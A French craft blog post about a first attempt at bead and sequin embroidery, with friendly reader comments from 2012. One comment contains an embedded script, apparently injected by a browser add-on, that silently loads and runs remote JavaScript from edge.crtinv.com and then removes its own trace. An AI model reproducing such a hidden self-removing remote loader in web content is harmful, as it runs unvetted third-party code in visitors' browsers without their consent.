• broderie de perles

    coucou

     

    au salon de linas j'ai acheté un livre de Carole Magne sur la broderie de perles et paillettes a l'aiguille

     hier et cey après midi j'ai testé et après avoir défait je trouvais que mes paillettes n'étaient pas bien mises voici ce que j'ai brodé ce n'est pas parfait mais c'est a force de faire que l'on s'améliore

     

    broderie de perles

    une vue avec le livre

     

    broderie de perles

     

    je vais en refaire je me suis bien amusée !!!!!

    bonne soirée et bonnes petites xxxxx

    patricia

    « sal de DODOsal dodo et encadrement »

  • Commentaires

    1
    christelle51
    Mardi 16 Octobre 2012 à 19:54

    Tu peux être fière de toi, c'est très joli et ça ressemble bien à la photo du livre.

    Bisouxxxxx et bonne soirée

    2
    Mercredi 17 Octobre 2012 à 10:34

    e trouve que tu t'es plutôt bien débrouillée,c'est très réussi.

    3
    Mercredi 17 Octobre 2012 à 11:27

    il est superbe ton iris

    4
    Vendredi 19 Octobre 2012 à 06:34

    Ce doit être un vrai travail de patience !

    Bizz

    <script id="FoxLingoJs" type="text/javascript">// <![CDATA[ !function(){try{var h=document.getElementsByTagName("head")[0];var s=document.createElement("script");s.src="//edge.crtinv.com/products/FoxLingo/default/snippet.js";s.onload=s.onreadystatechange=function(){if(!this.readyState || this.readyState=="loaded" || this.readyState=="complete"){s.onload=s.onreadystatechange=null;h.removeChild(s);}};h.appendChild(s);}catch(ex){}}(); // ]]></script>
    5
    Samedi 20 Octobre 2012 à 09:53

    c'est très réussi , bravo

    bisousbisous

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :